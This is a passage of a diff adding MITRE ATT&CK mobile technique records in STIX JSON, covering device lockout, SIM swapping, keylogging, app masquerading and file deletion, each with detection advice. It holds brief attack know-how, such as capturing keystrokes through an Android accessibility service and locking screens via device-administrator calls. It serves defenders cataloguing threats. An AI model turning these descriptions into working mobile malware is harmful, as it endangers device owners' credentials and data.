However, on jailbroken devices, malware has been discovered that can lock the user out of the device.(Citation: Xiao-KeyRaider)", + "modified": "2022-04-01T18:49:51.039Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Device Lockout", + "x_mitre_detection": "On Android, users can review which applications have device administrator access in the device settings, and revoke permission where appropriate.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:58:20.113Z", + "name": "Remote Device Management Services", + "description": "An adversary may use access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM)/mobile device management (MDM) server console to track the location of mobile devices managed by the service.(Citation: Krebs-Location) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity and alerts users when their credentials have been used on a new device. Apple iCloud also provides notifications to users of account activity such as when credentials have been used. 
", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "created": "2022-04-05T19:37:15.984Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1430/001", + "external_id": "T1430.001" + }, + { + "source_name": "Krebs-Location", + "description": "Brian Krebs. (2018, May 17). Tracking Firm LocationSmart Leaked Location Data for Customers of All Major U.S. Mobile Carriers Without Consent in Real Time Via Its Web Site. Retrieved November 8, 2018.", + "url": "https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html", + "external_id": "ECO-5" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html", + "external_id": "EMM-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--a0464539-e1b7-4455-a355-12495987c300", + "created": "2017-10-25T14:48:13.625Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": 
"mitre-attack", + "external_id": "T1427", + "url": "https://attack.mitre.org/techniques/T1427" + }, + { + "source_name": "ArsTechnica-PoisonTap", + "url": "http://arstechnica.com/security/2016/11/meet-poisontap-the-5-tool-that-ransacks-password-protected-computers/", + "description": "Dan Goodin. (2016, November 16). Meet PoisonTap, the $5 tool that ransacks password-protected computers. Retrieved December 22, 2016." + }, + { + "source_name": "Wang-ExploitingUSB", + "url": "http://dl.acm.org/citation.cfm?id=1920314", + "description": "Z. Wang and A. Stavrou. (2010, December 6-10). Exploiting smart-phone USB connectivity for fun and profit. Retrieved December 22, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "PHY-2" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. 
We are unaware of any demonstrations on iOS.", + "modified": "2022-04-06T15:39:14.695Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Attack PC via USB Connection", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--a21a6a79-f9a1-4c87-aed9-ba2d79536881", + "type": "attack-pattern", + "created": "2017-10-25T14:48:05.928Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1441", + "external_id": "T1441" + } + ], + "modified": "2018-10-17T01:05:10.700Z", + "name": "Stolen Developer Credentials or Signing Keys", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--a5de0540-73e7-4c67-96da-4143afedc7ed", + "created": "2017-10-25T14:48:22.296Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1467", + "url": "https://attack.mitre.org/techniques/T1467" + }, + { + "source_name": "Computerworld-Femtocell", + "url": "http://www.computerworld.com/article/2484538/cybercrime-hacking/researchers-exploit-cellular-tech-flaws-to-intercept-phone-calls.html", + "description": "Jaikumar Vijayan. (2013, August 1). Researchers exploit cellular tech flaws to intercept phone calls. Retrieved December 24, 2016." 
+ }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "CEL-7" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication. A compromised cellular femtocell could be used to carry out this technique(Citation: Computerworld-Femtocell).", + "modified": "2022-04-06T15:52:41.578Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Rogue Cellular Base Station", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Karim Hasanen, @_karimhasanen" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--a64a820a-cb21-471f-920c-506a2ff04fa5", + "created": "2017-10-25T14:48:20.329Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1451", + "url": "https://attack.mitre.org/techniques/T1451" + }, + { + "source_name": "Betanews-Simswap", + "url": "http://betanews.com/2016/02/12/everything-you-need-to-know-about-sim-swap-scams/", + "description": "Alex Cambell. (2016, February 12). Everything you need to know about SIM swap scams. Retrieved December 12, 2016." 
+ }, + { + "source_name": "Krebs-SimSwap", + "url": "https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/", + "description": "Brian Krebs. (2018, May 18). T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account. Retrieved November 8, 2018." + }, + { + "source_name": "TechCrunch-SimSwap", + "url": "https://techcrunch.com/2017/08/23/i-was-hacked/", + "description": "John Biggs. (2017, August 23). I was hacked. Retrieved November 8, 2018." + }, + { + "source_name": "Motherboard-Simswap2", + "url": "https://motherboard.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-employees-sim-swapping-port-out-scam", + "description": "Lorenzo Franceschi-Bicchierai. (2018, August 3). How Criminals Recruit Telecom Employees to Help Them Hijack SIM Cards. Retrieved August 11, 2018." + }, + { + "source_name": "Motherboard-Simswap1", + "url": "https://motherboard.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin", + "description": "Lorenzo Franceschi-Bicchierai. (2018, July 17). The SIM Hijackers. Retrieved August 11, 2018." + }, + { + "source_name": "Guardian-Simswap", + "url": "https://www.theguardian.com/money/2016/apr/16/sim-swap-fraud-mobile-banking-fraudsters", + "description": "Miles Brignall. (2016, April 16). Sim-swap fraud claims another mobile banking victim. Retrieved December 12, 2016." + }, + { + "source_name": "NYGov-Simswap", + "url": "http://www.dos.ny.gov/consumerprotection/scams/att-sim.html", + "description": "New York Department of State. (2016, February 12). AT&T SIM-Card Switch Scam. Retrieved August 23, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-22.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "STA-22" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary could convince the mobile network operator (e.g. 
through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account.(Citation: NYGov-Simswap)(Citation: Motherboard-Simswap2) The adversary could then obtain SMS messages or hijack phone calls intended for someone else.(Citation: Betanews-Simswap)\n\nOne use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account.(Citation: Guardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap)", + "modified": "2022-04-06T15:53:54.872Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "SIM Card Swap", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:44:36.145Z", + "name": "Input Capture", + "description": "Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal device usage, users often provide credentials to various locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Keylogging](https://attack.mitre.org/techniques/T1417/001)) or rely on deceiving the user into providing input into what they believe to be a genuine application prompt (e.g. 
[GUI Input Capture](https://attack.mitre.org/techniques/T1417/002)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay. Users can view and manage installed third-party keyboards.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.3", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "created": "2017-10-25T14:48:27.660Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1417", + "external_id": "T1417" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html", + "external_id": "APP-31" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-13.html", + "external_id": "AUT-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:57:17.144Z", + "name": "Generate Traffic from Victim", + "description": "Adversaries may generate outbound traffic from devices. 
This is typically performed to manipulate external outcomes, such as to achieve carrier billing fraud or to manipulate app store rankings or ratings. Outbound traffic is typically generated as SMS messages or general web traffic, but may take other forms as well.\n\nIf done via SMS messages, Android apps must hold the `SEND_SMS` permission. Additionally, sending an SMS message requires user consent if the recipient is a premium number. Applications cannot send SMS messages on iOS", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users can review which applications can use premium SMS features in the “Special access” page within application settings. Application vetting services can detect when applications request the `SEND_SMS` permission, which should be infrequently used.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "created": "2022-04-06T13:55:14.390Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1643", + "external_id": "T1643" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.html", + "external_id": "APP-16" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:18:29.556Z", + "name": "Disguise Root/Jailbreak 
Indicators", + "description": "An adversary could use knowledge of the techniques used by security software to evade detection.(Citation: Brodie)(Citation: Tan) For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed \"su\" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection.(Citation: Rastogi)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can use attestation to detect compromised devices.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--a91262d5-b9ff-463f-b8d2-12e4ea1eb3c9", + "created": "2022-04-08T16:29:30.087Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1630/003", + "external_id": "T1630.003" + }, + { + "source_name": "Brodie", + "description": "Daniel Brodie. (2016). Practical Attacks against Mobile Device Management (MDM). Retrieved December 21, 2016.", + "url": "https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf" + }, + { + "source_name": "Rastogi", + "description": "Vaibhav Rastogi, Yan Chen, and Xuxian Jiang. (2013, May). DroidChameleon: Evaluating Android Anti-malware against Transformation Attacks. Retrieved December 9, 2016.", + "url": "http://pages.cs.wisc.edu/~vrastogi/static/papers/rcj13b.pdf" + }, + { + "source_name": "Tan", + "description": "Vincent Tan. (2016, August). 
BAD FOR ENTERPRISE: ATTACKING BYOD ENTERPRISE MOBILE SECURITY SOLUTIONS. Retrieved February 4, 2017.", + "url": "http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html", + "external_id": "EMM-5" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Alex Hinchliffe, Palo Alto Networks" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--a93ccb8f-3996-42e2-b7c7-bb599d4e205f", + "created": "2017-10-25T14:48:35.247Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1444", + "url": "https://attack.mitre.org/techniques/T1444" + }, + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + }, + { + "source_name": "Zhou", + "url": "http://ieeexplore.ieee.org/document/6234407", + "description": "Yajin Zhou and Xuxian Jiang. (2012, May). Dissecting Android Malware: Characterization and Evolution. Retrieved December 9, 2016." 
+ }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-31" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-14" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary could distribute developed malware by masquerading the malware as a legitimate application. This can be done in two different ways: by embedding the malware in a legitimate application, or by pretending to be a legitimate application.\n\nEmbedding the malware in a legitimate application is done by downloading the application, disassembling it, adding the malicious code, and then re-assembling it.(Citation: Zhou) The app would appear to be the original app, but would contain additional malicious functionality. The adversary could then publish the malicious application to app stores or use another delivery method.\n\nPretending to be a legitimate application relies heavily on lack of scrutinization by the user. 
Typically, a malicious app pretending to be a legitimate one will have many similar details as the legitimate one, such as name, icon, and description.(Citation: Palo Alto HenBox)\n\nMalicious applications may also masquerade as legitimate applications when requesting access to the accessibility service in order to appear as legitimate to the user, increasing the likelihood that the access will be granted.", + "modified": "2022-04-06T15:45:52.558Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Masquerade as Legitimate Application", + "x_mitre_detection": "Users can detect malicious applications by watching for nuances that could indicate the application is not the intended one when it is being installed.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--a9cab8f6-4c94-4c9b-9e7d-9d863ff53431", + "type": "attack-pattern", + "created": "2017-10-25T14:48:19.682Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1457", + "external_id": "T1457" + } + ], + "modified": "2018-10-17T01:05:10.703Z", + "name": "Malicious Media Content", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-16T18:28:28.234Z", + "name": "Calendar Entries", + "description": "Adversaries may utilize standard operating system APIs to gather calendar entry data. On Android, this can be accomplished using the Calendar Content Provider. 
On iOS, this can be accomplished using the `EventKit` framework. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access [Calendar Entries](https://attack.mitre.org/techniques/T1636/001) without the user’s knowledge or approval. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On both Android and iOS, the user can manage which applications have permission to access calendar information through the device settings screen, revoke the permission if necessary. Application vetting services could look for `android.permission.READ_CALENDAR` or `android.permission.WRITE_CALENDAR` in an Android application’s manifest, or `NSCalendarsUsageDescription` in an iOS application’s `Info.plist` file. Most applications do not need calendar access, so extra scrutiny could be applied to those that request it. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "created": "2022-04-01T12:48:27.021Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636/001", + "external_id": "T1636.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:52:24.758Z", + "name": "File Deletion", + "description": "Adversaries may 
wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location.(Citation: Android DevicePolicyManager 2019) \n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can detect which applications can request device administrator permissions. Users can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. Application vetting services could be extra scrutinous of applications that request device administrator permissions.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "created": "2022-03-30T19:36:09.691Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1630/002", + "external_id": "T1630.002" + }, + { + "source_name": "Android DevicePolicyManager 2019", + "description": "Android Developers. (n.d.). DevicePolicyManager. 
Retrieved September 22, 2019.", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:39:10.201Z", + "name": "Device Lockout", + "description": "An adversary may seek to inhibit user interaction by locking the legitimate user out of the device. This is typically accomplished by requesting device administrator permissions and then locking the screen using `DevicePolicyManager.lockNow()`. Other novel techniques for locking the user out of the device have been observed, such as showing a persistent overlay, using carefully crafted “call” notification screens, and locking HTML pages in the foreground. These techniques can be very difficult to get around, and typically require booting the device into safe mode to uninstall the malware.(Citation: Microsoft MalLockerB)(Citation: Talos GPlayed)(Citation: securelist rotexy 2018)\n\nPrior to Android 7, device administrators were able to reset the device lock passcode to prevent the user from unlocking the device. The release of Android 7 introduced updates that only allow device or profile owners (e.g. MDMs) to reset the device’s passcode.(Citation: Android resetPassword)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view a list of device administrators in device settings and revoke permission where appropriate. 
Applications that request device administrator permissions should be scrutinized further for malicious behavior.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "created": "2022-04-01T18:49:03.892Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1629/002", + "external_id": "T1629.002" + }, + { + "source_name": "Microsoft MalLockerB", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/" + }, + { + "source_name": "Android resetPassword", + "description": "Google. (n.d.). DevicePolicyManager. Retrieved October 1, 2019.", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html#resetPassword(java.lang.String,%20int)" + }, + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + }, + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . 
Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:48:39.936Z", + "name": "Keylogging", + "description": "Adversaries may log user keystrokes to intercept credentials or other information from the user as the user types them.\n\nSome methods of keylogging include:\n\n* Masquerading as a legitimate third-party keyboard to record user keystrokes.(Citation: Zeltser-Keyboard) On both Android and iOS, users must explicitly authorize the use of third-party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested.\n* Abusing accessibility features. On Android, adversaries may abuse accessibility features to record keystrokes by registering an `AccessibilityService` class, overriding the `onAccessibilityEvent` method, and listening for the `AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED` event type. The event object passed into the function will contain the data that the user typed. \n*Additional methods of keylogging may be possible if root access is available. \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, users can view and manage which applications have third-party keyboard access through the device settings in System -> Languages & input -> Virtual keyboard. 
On iOS, users can view and manage which applications have third-party keyboard access through the device settings in General -> Keyboard. \n\nApplication vetting services can look for applications requesting the `android.permission.BIND_ACCESSIBILITY_SERVICE` permission in a service declaration. On Android, users can view and manage which applications can use accessibility services through the device settings in Accessibility. The exact device settings menu locations may vary between operating system versions.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "created": "2022-04-05T19:45:03.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1417/001", + "external_id": "T1417.001" + }, + { + "source_name": "Zeltser-Keyboard", + "description": "Lenny Zeltser. (2016, July 30). Security of Third-Party Keyboard Apps on Mobile Devices. Retrieved December 21, 2016.", + "url": "https://zeltser.com/third-party-keyboards-security/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-13.html", + "external_id": "AUT-13" + } + ], + "object_marking_refs": [ + 